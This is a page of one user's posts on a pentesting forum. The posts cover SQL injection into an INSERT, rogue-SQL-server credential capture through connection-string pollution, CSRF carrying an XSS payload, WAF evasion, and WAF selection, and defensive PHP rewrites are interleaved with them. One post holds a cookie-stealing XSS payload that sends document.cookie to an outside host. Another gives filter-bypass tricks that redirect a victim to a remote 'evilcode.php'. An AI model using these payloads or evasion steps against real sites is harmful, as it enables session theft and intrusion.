EH-Net
May 21, 2013, 04:01:41 PM
Show Posts
1  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: SQL Injection into an INSERT statement. on: May 15, 2013, 03:21:07 PM
Total sense. I should have done that earlier! That helped, along with turning on logging in MySQL to see the queries.

Unfortunately, I realized that magic_quotes is on in PHP (I thought I checked that earlier), so I don't know if this is even exploitable, since the id parameter is quoted. If it weren't, it would be fair game, but I don't see a way out of this one without single quotes.

If I'm missing anything obvious, let me know!
2  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: SQL Injection into an INSERT statement. on: May 13, 2013, 10:56:45 AM
Still no luck. I removed the quotes from the ID parameter in the PHP code to test and was able to use some true/false statements to verify that I could inject, but as soon as I add the single quotes back into the code, it's no go.

Any time I provide anything other than an integer in the ID field, I get the "Data truncated" error. If I try to inject anything into the comment field, it gets put into the DB exactly as I typed it. I don't see any escaping in the code, but can't figure out why it won't work with the single quotes on that field.


On a similar note, is it possible to inject into a query that gets provided to the mysql_num_rows function? I haven't been able to get it working. I have some code like this and am wondering if it's exploitable as well:
$query = mysql_query("SELECT * FROM products WHERE id=" . $id);
$number = mysql_num_rows($query);


Thanks for the help
3  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: SQL Injection into an INSERT statement. on: May 13, 2013, 09:37:43 AM
Thanks for the info, guys. I'm gonna look into it this morning and I'll post back with the outcome. The ID parameter is an integer, so I don't know why quotes are around it, but it's not my code. I'll try changing the code and testing it to see the results, but I'd also like to get it working with how the code is now, if that's even possible.
Either way, I'm gonna go at it a few more times this morning and see what I can find.
4  Ethical Hacking Discussions and Related Certifications / Web Applications / SQL Injection into an INSERT statement. on: May 12, 2013, 08:50:18 PM
Hi all,

I'm having trouble making SQL injection work with an INSERT statement and I'm not sure what I'm doing wrong. The PHP code for the SQL request looks like this:

mysql_query("INSERT INTO txtcomment (id,comment) VALUES ('" . $_POST['id'] . "','" . $_POST['comment'] . "')");

Whenever I try to insert into the comment field, it doesn't seem to work. If I attempt to insert into the ID field, it gives me the error "ERROR: Data truncated for column "id" at row 1". It does that even if I just add a ' to the id parameter. If I put a character other than a number into the ID field, I get the error "ERROR: Out of range value adjusted for column "id" at row 1".

When I attempt it in the comment field, my whole query goes into the database, special characters and all. There doesn't seem to be any escaping done in the PHP code, so I can't tell why I can't get it to work.
Any obvious mistakes I'm making?
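The two queries quoted in this thread (the INSERT above and the `mysql_num_rows` SELECT from the follow-up post), rewritten from the defender's side as an added example that is not the poster's code. It uses PDO prepared statements so user input is never part of the SQL text, and validates `id` as an integer before it reaches MySQL, which is also where the "Data truncated" and "Out of range" errors in the thread come from: MySQL coercing a non-numeric string into an integer column. The DSN, user and password are placeholders; `connect`, `requireInt`, `insertComment` and `countProducts` are names chosen for this example.

```php
<?php
// Added example, not the poster's code: the two queries from this thread,
// rewritten so that user input never becomes part of the SQL text.
// Assumes PDO with the MySQL driver; DSN, user and password are placeholders.

// The thread's vulnerable forms, for comparison (legacy mysql_* extension,
// removed in PHP 7, so kept here as a comment):
//   mysql_query("INSERT INTO txtcomment (id,comment) VALUES ('" . $_POST['id'] . "','" . $_POST['comment'] . "')");
//   $query  = mysql_query("SELECT * FROM products WHERE id=" . $id);
//   $number = mysql_num_rows($query);
// Quoting id and relying on magic_quotes only narrows the first one; the
// SELECT has no quotes at all, so its structure depends entirely on $id.

function connect(string $dsn, string $user, string $password): PDO
{
    return new PDO($dsn, $user, $password, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        // Real server-side prepares rather than client-side string building.
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// id is an integer column: validate the type before it reaches the database,
// so a non-numeric value is rejected with a clear error instead of being
// coerced or truncated by MySQL.
function requireInt($value): int
{
    $int = filter_var($value, FILTER_VALIDATE_INT);
    if ($int === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    return $int;
}

function insertComment(PDO $pdo, $id, string $comment): void
{
    $stmt = $pdo->prepare('INSERT INTO txtcomment (id, comment) VALUES (:id, :comment)');
    $stmt->bindValue(':id', requireInt($id), PDO::PARAM_INT);
    $stmt->bindValue(':comment', $comment, PDO::PARAM_STR);
    $stmt->execute();
}

function countProducts(PDO $pdo, $id): int
{
    // COUNT(*) on the server replaces fetching every row just to call mysql_num_rows().
    $stmt = $pdo->prepare('SELECT COUNT(*) FROM products WHERE id = :id');
    $stmt->bindValue(':id', requireInt($id), PDO::PARAM_INT);
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Usage with placeholder credentials:
// $pdo = connect('mysql:host=localhost;dbname=testdb;charset=utf8mb4', 'dbuser', 'dbpass');
// insertComment($pdo, $_POST['id'] ?? '', (string) ($_POST['comment'] ?? ''));
// echo countProducts($pdo, $_GET['id'] ?? ''), PHP_EOL;
```

With emulated prepares switched off the MySQL server receives the statement text and the parameters separately, so neither the quoted `id` nor the unquoted numeric comparison can be altered by the input, and the comment is stored verbatim without the application ever having to escape it.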
5  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Elearnsecurity new Web App security course info on: April 30, 2013, 03:59:22 PM
I was considering buying the bundle, but it seems that you must use the exam vouchers within a certain period, right? I don't want to buy both and only have 120 days or something to finish both courses and exams. I've been unable to get a response from Armando, and don't know when my 50% coupon code (for being eCPPT silver) runs out. His original email says May 30, but I had a feeling he may mean April 30th.
6  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Help with Rogue sql server for CSPP attack on: December 17, 2012, 01:41:16 PM
You're probably right. I guess proving the CSPP vulnerability is present will have to be enough for now. Thanks for your help.
7  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Help with Rogue sql server for CSPP attack on: December 13, 2012, 09:36:37 AM
So, I even emailed Chema and he verified that getting that error is normal, but even though it's an untrusted domain, you should still be able to grab the hashes before that error is raised. He suggested Cain for sniffing, but Cain isn't grabbing anything, even when I did a test connection with valid credentials and no error. I have the PCAP with the traffic, but can't pick out if there are any hashes.
Are there any other good sniffers out there for capturing SQL or NTLM credentials?
I ran the pcap through dsniff, but didn't get any results.

Looks like this is now moving more into the realm of network pen testing.

8  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Help with Rogue sql server for CSPP attack on: December 10, 2012, 06:07:44 PM
The error in the SQL log says:
SSPI handshake failed with error code 0x8009030c, state 14 while establishing a connection with integrated security; the connection has been closed. Reason: AcceptSecurityContext failed. The Windows error code indicates the cause of failure. The logon attempt failed. [CLIENT: xxx.xxx.xxx.xxx]

Even though I set this box up as a domain controller, the SQL instance still shows as COMPUTERNAME\sqlinstance instead of DOMAINNAME\sqlinstance.

The more I look at it, I think it may be a problem with DNS name mismatches. When I enter my IP as the data source on the victim's server, it seems to do a reverse DNS lookup and connect via the DNS name, which doesn't match the Active Directory domain name of the system. So, it will try to connect to something like d-127-0-0-1.comcast.net\sqlinstance instead of DOMAINNAME\sqlinstance.

On the actual SQL/AD server, if I try to log in via SQL Management Studio to d-127-0-0-1.comcast.net\sqlinstance, it gives me the same "untrusted domain" error.

I tried adding d-127-0-0-1.comcast.net to the hosts file and pointing it back to the server, but no change.

Sorry if this post makes no sense - I've been going at it all day and may be a little loopy.
9  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Help with Rogue sql server for CSPP attack on: December 10, 2012, 09:47:29 AM
Thanks for the reply. The target server is SQL Server 2012. I've set up rogue servers with SQL 2005, 2008, and 2012 Express versions.
I'm in the process of setting up a SQL instance on a test domain controller with the same domain name as the target domain.

I wish there was a way to use the CSPP attack to cause the target server to send over its SQL user credentials, not Windows, then this wouldn't be an issue, but I don't think that's possible.

I'll check out that link a little more and check the logs on this new server once I get it up and running. I'll post back after I find out more.
10  Ethical Hacking Discussions and Related Certifications / Web Applications / Help with Rogue sql server for CSPP attack on: December 10, 2012, 01:14:27 AM
Hi all,

So, I'm testing out a web app and found a CSPP vulnerability, as detailed here (http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdf). Chema illustrates setting up a rogue SQL server and forcing the victim to connect to your server, while you sniff their Windows credentials.
Whenever I set up a rogue server and force a connection, I don't get the goods from the victim. I set up Cain to sniff, as in the white paper, but nothing. I loaded up Wireshark and see some NTLMSSP messages back and forth, but then my rogue server responds with "Login failed. The login is from an untrusted domain and cannot be used with Windows authentication."
The victim and rogue server are not on the same network or domain.

Does anyone know of a way to configure my rogue server to accept the victim domain and therefore capture the credentials? Thanks in advance!
11  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: CSRF with XSS payload encoding help on: August 02, 2012, 11:32:16 PM
Do any of those work with POST requests? I am not aware of any that handle those, but I'd love to hear of something like that if you know of one.

12  Ethical Hacking Discussions and Related Certifications / Web Applications / CSRF with XSS payload encoding help on: August 02, 2012, 02:13:18 PM
Hey everyone,

So, I've found an XSS vuln that I'd like to exploit via a CSRF vuln, but I'm having trouble with encoding in the CSRF.
Right now my CSRF exploit is just a hidden HTML form that's auto-submitted by JavaScript. The XSS payload requires double quotes, which breaks the HTML form. For example, the value with the payload would look something like this:

value="<img src="#" onerror="javascript:document.location='http://site/?'+document.cookie">"

That obviously doesn't work because the quotes in the payload screw up the form. I can't URL encode the quotes because then they get double encoded and the payload won't execute. I've tried changing the enctype of the form to text/plain and multipart/form-data but no luck. The CSRF vulnerable link will only take POST, not GET.

Any ideas on how to get around this? I was thinking it may be possible to dynamically construct an HTTP POST request with JavaScript to submit it, but I'm not sure how.

Any input is appreciated!
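The server-side view of the same scenario, as an added example that is not part of the post: the form handler only accepts a POST that carries a per-session CSRF token, and any value echoed back into an HTML attribute is encoded with `ENT_QUOTES`, so a double quote in the input becomes `&quot;` and cannot terminate the `value="..."` attribute the way the payload in the post relies on. The route `/profile`, the field `display_name` and the function names are assumptions for this example.

```php
<?php
// Added example, not from the post: a form handler that closes both halves
// of the scenario in this thread. Assumes PHP sessions are available;
// /profile, display_name and the function names are placeholders.

session_start();

// One random token per session, generated with a CSPRNG.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrfTokenIsValid(?string $submitted): bool
{
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    // hash_equals() compares in constant time.
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Encode for an HTML attribute value. ENT_QUOTES covers both ' and ", so
// an <img ... onerror=...> payload inside the value is rendered as inert text
// instead of closing the attribute and starting a new tag.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderForm(string $previousValue = ''): string
{
    return '<form method="POST" action="/profile">'
        . '<input type="hidden" name="csrf_token" value="' . attr(csrfToken()) . '">'
        . '<input type="text" name="display_name" value="' . attr($previousValue) . '">'
        . '<button type="submit">Save</button>'
        . '</form>';
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // A cross-site auto-submitted form has no way to read this session's
    // token, so the request is refused before any input is processed.
    if (!csrfTokenIsValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    $name = (string) ($_POST['display_name'] ?? '');
    // ... persist $name here (with a prepared statement) ...
    echo renderForm($name);
} else {
    echo renderForm();
}
```

The token check removes the CSRF half and the attribute encoding removes the XSS half; either alone leaves a gap, which is why the post's chain works against an application that has neither. Marking the session cookie `SameSite=Lax` (the `samesite` option of `session_set_cookie_params()` in PHP 7.3 and later) adds defence in depth against the cross-site POST.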
13  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Bypassing urlscan on: June 28, 2012, 03:30:40 PM
Well, I've never gone up against urlscan before but I just beat F5's ASM XSS filter for the first time, so maybe some of the same tricks will work.

Some of the things I used were:
1. I ditched using <script> because I couldn't get it past. Instead I used <image>. Notice it's not <img>. The WAF would filter <img> tags but not <image>, and Firefox would display <image> just fine.
Try iframe, style, and object tags too.

2. Split up the attack between parameters if possible. Break it at key points where the WAF won't be able to understand what's going on.

3. If ()'s are being blocked, you can try redirecting to a server that you own and get your code to run from there. I couldn't load directly to the site that I was attacking and it was filtering most javascript actions, but I was able to use an image tag and slip a "location" in an onload like this:
onload=location="http://server/evilcode.php".

4. I also ran across spots where the letters "http" were filtered. Here you can usually drop the http: and just use //server/evilcode.php.


I don't know if any of that will be any help at all, and may be completely irrelevant to urlscan, but those are some of the things I've learned with evasion and hopefully some of it carries over.
14  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Advice for WAF selection and implementation on: May 31, 2012, 01:02:50 PM
Yeah, that budget range definitely is all over the place. Right now I don't think there is a defined budget, which is why the plan went from ModSecurity to F5, and may go back to ModSecurity! It's up in the air right now, but I'm assuming I have budget backing.

F5 is definitely what I'd like to go with and seems like a mature product. I'm glad you agree with me on the VM question. F5 does have a virtual solution, but I've heard some criticism on it. Security concerns aside, it just seems like a better option to keep the security boxes separate for the sake of simplicity and even performance as you said. It seems weird to me to have the load balancer on the same system that you're balancing the load for...

Anyway, thanks for your input, I wanted to make sure I wasn't way off in my thinking.
15  Ethical Hacking Discussions and Related Certifications / Web Applications / Advice for WAF selection and implementation on: May 31, 2012, 07:39:21 AM
So, if I were to get a WAF that also doubled as a load balancer, does anyone have any advice on a good option? I've been looking at F5, Netscaler, Fortiweb, Armorlogic, and Barracuda. I'd consider Imperva as well, but it doesn't have load balancing capabilities. Most of the reviews I've found are dated, so I'd love to hear some opinions!


Also, I have a question on implementation. Do you see problems with deploying a WAF/Load Balancer as a virtual machine on the same ESX server as the web servers? I prefer to have them as physically separate and have some concerns about putting them on the same box, but I'm not sure if I'm just over-thinking it.

Thanks guys!
© 2013 The Ethical Hacker Network